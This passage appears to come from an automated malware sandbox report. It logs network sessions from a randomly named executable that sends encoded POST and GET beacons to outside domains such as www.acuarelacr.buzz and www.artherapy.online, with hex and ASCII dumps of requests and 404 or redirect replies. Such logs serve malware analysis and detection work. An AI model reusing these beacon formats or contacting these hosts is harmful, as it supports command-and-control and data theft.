70 39 67 6b 36 70 4c 77 48 49 37 68 70 34 79 57 74 4d 39 4d 4a 32 4d 39 4f 52 4e 45 62 41 4f 4c 30 45 62 62 79 53 56 68 44 53 6e 38 44 64 75 33 64 4e 41 2f 54 4f 66 55 72 50 72 41 4d 47 49 47 2f 36 59 59 49 6b 71 47 6c 42 75 41 71 41 76 6a 43 66 6d 6a 44 37 74 70 6a 4b 51 45 6a 73 55 52 36 45 77 67 44 68 42 50 68 65 34 74 4e 62 53 66 2f 4f 79 50 56 34 4c [TRUNCATED] Data Ascii: VzK4o8Jx=chf09N2auCxByvcyI9eI0PnXYGVWcLbrf0DgG8PPFSWxYFlJqaqkkb1lDsfycKiZuRZnWEPAHzRAMVZnJhB2Twtsjfd19d0HfohhQn0qRMDGQj4H8k95GndfKKUI7Q3+nI7hkYLyYlN8CbmV0Hdw8vOqviX6V5MyWhGcVxJT/bjiY8a8QvxHIE9sEVyqFXWLGJk00FD3gwRY/YWgT3p9gk6pLwHI7hp4yWtM9MJ2M9ORNEbAOL0EbbySVhDSn8Ddu3dNA/TOfUrPrAMGIG/6YYIkqGlBuAqAvjCfmjD7tpjKQEjsUR6EwgDhBPhe4tNbSf/OyPV4LZEStciFuu8uU+8lWhxUSgNeOTydlXIgU/yADfCVhPz7/1Xs0J6TAoLQgdNQvyMw7vZestQ7w3/arEfXGwzd+hlKYEX6Hs39tCH6EuFj4+MgAXOCBVZH+fpVxTOdQ7oR2XFgLB7qfk6X8+vXA4VyZStKJzAdV+BqeV23TEyKBNezYx8QrP3YouxhpBrwopz9xp24cAGpvfMe47yu9DRgjN2B99JwOgxdDVVkTpLlrrYns/KmobO3GFVzSp/y0p4xv+NM4Ow0evXV8g+FOP6xkve/5aFRWDHKJArYZv3973Vgm6NWTZZhxf79I/gLjoiwUlD1mwx4suQT4uIJQMULBONXpHOV+SQGOBeaOK2Fw26HWGPadj0C4w9XMif2T95hMtF+lxlkt3V1r/MpGh9qzcYXfTkpAMYYBwxmUTrPaTF9i5PFC8W/90RIFvnRSybrc5WB+ZR5ZpcJE9RA1We4toM3GSt+uqHz1UpcuD7gw/OXvHHZfdv/+WapZQVRQFlKygFov3xyZdJY5UfjZM2Ec3BFb6WYhAYxB6ZO5Nf+e5pr46g/sdhJWKzwm/L6eTkwmVUpV2xXArtuCNxYMMt0+lkGyCJS9BQzmNSuT9Rm6znh67L41Fux5oNwmoOCGmOGFd7Zqd+SoXIyr/u+QupIt3iZQ/b3snWRUyQ [TRUNCATED]
Oct 7, 2024 11:53:47.882931948 CEST	1227	OUT	Data Raw: 36 44 2f 6f 75 74 37 49 71 71 73 61 74 43 4e 78 50 50 39 48 52 52 50 42 72 4f 56 4e 61 43 6f 54 72 47 76 59 2f 6c 4c 72 39 75 62 38 41 47 2f 4a 54 6f 4a 66 31 79 30 75 54 52 4d 59 47 41 4a 73 37 41 67 51 2f 78 71 44 73 38 53 75 73 65 73 6b 44 35 Data Ascii: 6D/out7IqqsatCNxPP9HRRPBrOVNaCoTrGvY/lLr9ub8AG/JToJf1y0uTRMYGAJs7AgQ/xqDs8SuseskD5YBFeNXKmkXXJvhH+pWZJq25e2Nzgd4Lqj0+LxqXakAlr76cBpxesddZWBp2r7/jG0oPRf9tQGwiEu4gTv7wqRYmIVFSSVdh6YcjdsgtcGJNzn/4UQYxQPfJ1DqyN9IGSJngQos9oKBDbk2G3yTEQGkLic+Ns50Wj1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.30	49805	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:50.527168989 CEST	393	OUT	GET /xha2/?VzK4o8Jx=Rj3U+6DKgT5y3eE2BMi55/myWWswXqjiYm6dEeLSFSW8ImASiPiK/Z97R8zSc/+3mi0fAgijIiRKCB5FCR8rSXkZ7dd1+8Uof6hMEnAJapLXT04qmHdwDH0=&0zu8A=o2yln6 HTTP/1.1 Host: www.artherapy.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:53:51.522947073 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 07 Oct 2024 09:53:51 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 7a 4b 34 6f 38 4a 78 3d 52 6a 33 55 2b 36 44 4b 67 54 35 79 33 65 45 32 42 4d 69 35 35 2f 6d 79 57 57 73 77 58 71 6a 69 59 6d 36 64 45 65 4c 53 46 53 57 38 49 6d 41 53 69 50 69 4b 2f 5a 39 37 52 38 7a 53 63 2f 2b 33 6d 69 30 66 41 67 69 6a 49 69 52 4b 43 42 35 46 43 52 38 72 53 58 6b 5a 37 64 64 31 2b 38 55 6f 66 36 68 4d 45 6e 41 4a 61 70 4c 58 54 30 34 71 6d 48 64 77 44 48 30 3d 26 30 7a 75 38 41 3d 6f 32 79 6c 6e 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VzK4o8Jx=Rj3U+6DKgT5y3eE2BMi55/myWWswXqjiYm6dEeLSFSW8ImASiPiK/Z97R8zSc/+3mi0fAgijIiRKCB5FCR8rSXkZ7dd1+8Uof6hMEnAJapLXT04qmHdwDH0=&0zu8A=o2yln6"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.30	49806	161.97.168.245	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:57.016539097 CEST	665	OUT	POST /xlle/ HTTP/1.1 Host: www.acuarelacr.buzz Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.acuarelacr.buzz Referer: http://www.acuarelacr.buzz/xlle/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 54 39 61 71 71 70 4a 66 73 75 76 73 6e 70 77 64 47 5a 30 74 76 56 45 47 5a 7a 7a 53 61 4d 36 2f 44 62 57 63 70 4a 33 37 30 67 4a 5a 31 7a 41 5a 75 56 54 70 67 7a 68 35 4f 4b 30 2b 35 36 79 2f 53 43 52 74 6b 70 39 50 37 72 4a 35 73 67 6c 30 50 56 4b 63 75 6b 53 33 6c 32 4e 59 6f 55 69 54 67 64 39 53 37 63 45 4f 59 76 33 6d 77 6c 57 31 36 6f 2f 36 4e 76 39 6d 68 38 35 44 63 72 72 58 35 58 79 77 66 58 4e 41 66 78 39 6d 4b 55 5a 45 6e 32 46 65 42 39 39 56 44 31 50 73 45 2f 65 69 48 79 48 6d 79 41 2b 30 45 48 36 76 5a 77 57 33 46 66 56 38 7a 2f 70 48 4e 61 43 47 33 4d 4d 43 77 41 3d 3d Data Ascii: VzK4o8Jx=T9aqqpJfsuvsnpwdGZ0tvVEGZzzSaM6/DbWcpJ370gJZ1zAZuVTpgzh5OK0+56y/SCRtkp9P7rJ5sgl0PVKcukS3l2NYoUiTgd9S7cEOYv3mwlW16o/6Nv9mh85DcrrX5XywfXNAfx9mKUZEn2FeB99VD1PsE/eiHyHmyA+0EH6vZwW3FfV8z/pHNaCG3MMCwA==
Oct 7, 2024 11:53:57.191991091 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:53:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 7, 2024 11:53:57.192066908 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.30	49807	161.97.168.245	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:59.730465889 CEST	685	OUT	POST /xlle/ HTTP/1.1 Host: www.acuarelacr.buzz Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.acuarelacr.buzz Referer: http://www.acuarelacr.buzz/xlle/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 54 39 61 71 71 70 4a 66 73 75 76 73 39 49 67 64 41 2b 59 74 71 31 45 48 46 44 7a 53 55 73 37 32 44 62 61 63 70 49 7a 72 30 53 74 5a 79 58 45 5a 76 57 4c 70 6e 7a 68 35 46 71 31 36 30 61 79 32 53 43 4d 61 6b 73 39 50 37 72 4e 35 73 68 56 30 4f 6d 53 66 73 30 53 31 77 47 4e 65 6c 30 69 54 67 64 39 53 37 59 73 77 59 75 66 6d 78 56 47 31 37 4a 2f 37 54 66 39 6c 6f 63 35 44 59 72 72 54 35 58 7a 41 66 57 52 36 66 33 35 6d 4b 56 70 45 6e 69 52 5a 55 74 39 54 4d 56 4f 77 45 4d 37 7a 44 57 33 51 38 7a 69 48 4c 58 53 68 59 6e 6e 74 59 63 68 2b 67 66 56 71 52 62 76 75 31 4f 4e 5a 74 43 73 43 61 67 44 55 45 6d 31 59 62 4c 72 71 62 56 54 54 62 44 45 3d Data Ascii: VzK4o8Jx=T9aqqpJfsuvs9IgdA+Ytq1EHFDzSUs72DbacpIzr0StZyXEZvWLpnzh5Fq160ay2SCMaks9P7rN5shV0OmSfs0S1wGNel0iTgd9S7YswYufmxVG17J/7Tf9loc5DYrrT5XzAfWR6f35mKVpEniRZUt9TMVOwEM7zDW3Q8ziHLXShYnntYch+gfVqRbvu1ONZtCsCagDUEm1YbLrqbVTTbDE=
Oct 7, 2024 11:53:59.901441097 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:53:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 7, 2024 11:53:59.901453018 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.30	49808	161.97.168.245	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:02.457475901 CEST	1289	OUT	POST /xlle/ HTTP/1.1 Host: www.acuarelacr.buzz Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.acuarelacr.buzz Referer: http://www.acuarelacr.buzz/xlle/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 54 39 61 71 71 70 4a 66 73 75 76 73 39 49 67 64 41 2b 59 74 71 31 45 48 46 44 7a 53 55 73 37 32 44 62 61 63 70 49 7a 72 30 53 6c 5a 31 69 51 5a 75 33 4c 70 6d 7a 68 35 47 71 31 33 30 61 7a 6d 53 43 55 57 6b 73 35 35 37 6f 6c 35 75 44 74 30 47 33 53 66 6d 30 53 31 76 57 4e 66 6f 55 69 38 67 64 74 65 37 63 49 77 59 75 66 6d 78 58 75 31 38 59 2f 37 52 66 39 6d 68 38 35 66 63 72 72 72 35 58 71 34 66 57 55 46 66 78 6c 6d 4b 6d 52 45 6e 55 74 5a 55 74 39 54 43 31 4f 39 45 4d 48 79 44 57 4f 58 38 79 61 78 4d 6d 32 68 62 7a 6d 72 50 76 35 6c 79 50 64 33 51 62 76 6e 2b 34 55 48 6f 43 73 6b 58 33 72 6b 4f 33 56 62 56 4f 7a 5a 45 6c 37 70 4b 31 49 59 65 57 70 75 2b 43 70 71 76 38 75 6c 31 34 37 43 4e 74 61 52 30 72 32 79 4f 47 66 44 6e 4b 73 77 4e 74 51 4d 42 6d 39 39 51 4c 7a 34 7a 31 72 73 65 76 6b 4c 74 56 51 72 2b 78 30 45 38 67 63 41 51 32 2b 4b 74 4f 38 33 35 44 58 41 4f 38 69 76 59 7a 61 47 77 49 43 35 49 69 2f 48 69 57 6a 55 73 6a 62 6c 63 2b 52 69 67 64 35 4f 6e 49 6b 46 62 [TRUNCATED] Data Ascii: VzK4o8Jx=T9aqqpJfsuvs9IgdA+Ytq1EHFDzSUs72DbacpIzr0SlZ1iQZu3Lpmzh5Gq130azmSCUWks557ol5uDt0G3Sfm0S1vWNfoUi8gdte7cIwYufmxXu18Y/7Rf9mh85fcrrr5Xq4fWUFfxlmKmREnUtZUt9TC1O9EMHyDWOX8yaxMm2hbzmrPv5lyPd3Qbvn+4UHoCskX3rkO3VbVOzZEl7pK1IYeWpu+Cpqv8ul147CNtaR0r2yOGfDnKswNtQMBm99QLz4z1rsevkLtVQr+x0E8gcAQ2+KtO835DXAO8ivYzaGwIC5Ii/HiWjUsjblc+Rigd5OnIkFbrx3EkHGS4vCB7LOYWPr5XfpaSJ1WT+dfuU4q8jAB1h5t0Zf/bif2j7TFitvYpPTGLRjdtAqMVUqNWqRwBs22gD2OXh0faCm5iihy8BErKBoPsNmv6nZj7jr7rmzDbhTcIPn9BZTE/N5KxSt3CKv3Qmd6XLebHP6JReCkM434qbZrCx9iRN/oveHt19BUVsOiE70sd0iUiMRI3Y8swpk7WKUAnNftL1T0Srb0/Eo+OTaJOBrE2Up8ptWwq/+woihDs7sq8zE0YhVOVzeQKTNR7wopDO/D4zlWA+iUOyAm5oUdrx25/lHWuIHniebL4PwhtNe9CTNKcAaolHepnpGfHtaxdOB79bfi46qvsmPkn9EExXOmSrdfg4jsrQ1FeuFlGbAmHH/alZdc06zHyT65fkB9dfcxUk0FMgEOBISEguug0Zwe6lfcSlW0a0AwP8J+n6e7+8EMwiBD0W16tzou1TYEh+Oyptm1/rDTVEysGZ
Oct 7, 2024 11:54:02.457525969 CEST	2513	OUT	Data Raw: 50 5a 31 68 34 4a 66 59 4a 66 6b 51 72 6d 67 43 68 69 76 59 4d 36 55 77 51 48 55 68 6c 38 2b 47 46 2f 51 38 2f 59 66 30 39 36 70 61 46 39 6b 30 67 30 74 79 33 67 45 5a 6e 69 2f 67 36 58 49 48 31 33 6b 4f 6e 70 47 35 34 67 46 32 4a 55 72 6b 52 76 Data Ascii: PZ1h4JfYJfkQrmgChivYM6UwQHUhl8+GF/Q8/Yf096paF9k0g0ty3gEZni/g6XIH13kOnpG54gF2JUrkRvtQSLmDnTXfq98CcpBVlFIdGK/ps5jWA2YyL31FC5N/6ZHYVl2CDcdYk3GrV8SqorrI+HM1rvNuSvM8mi2xHjNrWRnE0h0yTnF/NJVofpyW4eL3mJu6HeZ1dlodqoeez1tlhl6triodut3M4Es0rof9Ioe8iA3Xi9Z
Oct 7, 2024 11:54:02.637006044 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:54:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 7, 2024 11:54:02.637027025 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.30	49809	161.97.168.245	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:05.166220903 CEST	392	OUT	GET /xlle/?VzK4o8Jx=e/yKpeJOjOfK3ogdJaNPolEHTgG8UOeOD7iGn6rK8RtZqhJ0uS/fq3wrSOZm1/LpQx9nm8RE0LQ7pT1GOQTyowfApUFnsluh2+dA7bAmT6aj2geZl7SaSIo=&0zu8A=o2yln6 HTTP/1.1 Host: www.acuarelacr.buzz Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:54:05.338562012 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:54:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
